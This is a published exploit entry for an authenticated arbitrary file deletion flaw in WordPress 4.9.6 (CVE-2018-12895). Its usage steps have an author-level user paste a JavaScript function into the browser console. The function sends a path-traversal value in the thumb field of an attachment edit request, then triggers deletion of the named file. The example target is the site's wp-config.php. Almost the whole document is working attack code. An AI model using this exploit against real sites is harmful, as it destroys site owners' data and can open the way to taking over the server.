# Exploit Title: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2) # Date: 04/08/2021 # Exploit Author: samguy # Vulnerability Discovery By: Slavco Mihajloski & Karim El Ouerghemmi # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/wordpress-4.9.6.tar.gz # Version: 4.9.6 # Tested on: Linux - Debian Buster (PHP 7.3) # Ref : https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution # EDB : EDB-44949 # CVE : CVE-2018-12895 /* Usage: 1. Login to wordpress with privileges of an author 2. Navigates to Media > Add New > Select Files > Open/Upload 3. Click Edit > Open Developer Console > Paste this exploit script 4. Execute the function, eg: unlink_thumb("../../../../wp-config.php") */ function unlink_thumb(thumb) { $nonce_id = document.getElementById("_wpnonce").value if (thumb == null) { console.log("specify a file to delete") return false } if ($nonce_id == null) { console.log("the nonce id is not found") return false } fetch(window.location.href.replace("&action=edit",""), { method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: "action=editattachment&_wpnonce=" + $nonce_id + "&thumb=" + thumb }) .then(function(resp0) { if (resp0.redirected) { $del = document.getElementsByClassName("submitdelete deletion").item(0).href if ($del == null) { console.log("Unknown error: could not find the url action") return false } fetch($del, { method: 'GET', credentials: 'include' }).then(function(resp1) { if (resp1.redirected) { console.log("Arbitrary file deletion of " + thumb + " succeed!") return true } else { console.log("Arbitrary file deletion of " + thumb + " failed!") return false } }) } else { console.log("Arbitrary file deletion of " + thumb + " failed!") return false } }) }